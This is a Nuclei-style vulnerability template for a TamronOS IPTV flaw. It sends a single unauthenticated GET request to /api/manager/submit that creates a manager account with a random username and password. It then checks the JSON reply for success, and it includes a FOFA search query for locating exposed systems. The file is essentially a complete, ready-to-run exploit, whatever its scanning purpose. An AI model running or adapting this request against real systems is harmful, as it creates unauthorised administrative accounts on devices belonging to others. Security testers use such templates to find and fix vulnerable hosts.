id: tamronos-user-creation

info:
  name: TamronOS IPTV - Arbitrary User Creation
  author: xc
  severity: high
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="TamronOS-IPTV系统"
  tags: tamronos,miconfig,iptv
variables:
  username: "{{to_lower(rand_text_alphanumeric(6))}}"
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/manager/submit?group=1&username={{username}}&password={{password}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"suc":true'
          - '"msg":"\u6210\u529f"'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200

# digest: 4a0a0047304502203032da92f0c714ba9ce9e2703c6ab0edf615319e9a058d1070ce6867d3799aa0022100ca8c67797d2065f61885b921e59b35638e643d210afe55430f6ed71bafc37416:922c64590222798bb761d5b6d8e72950
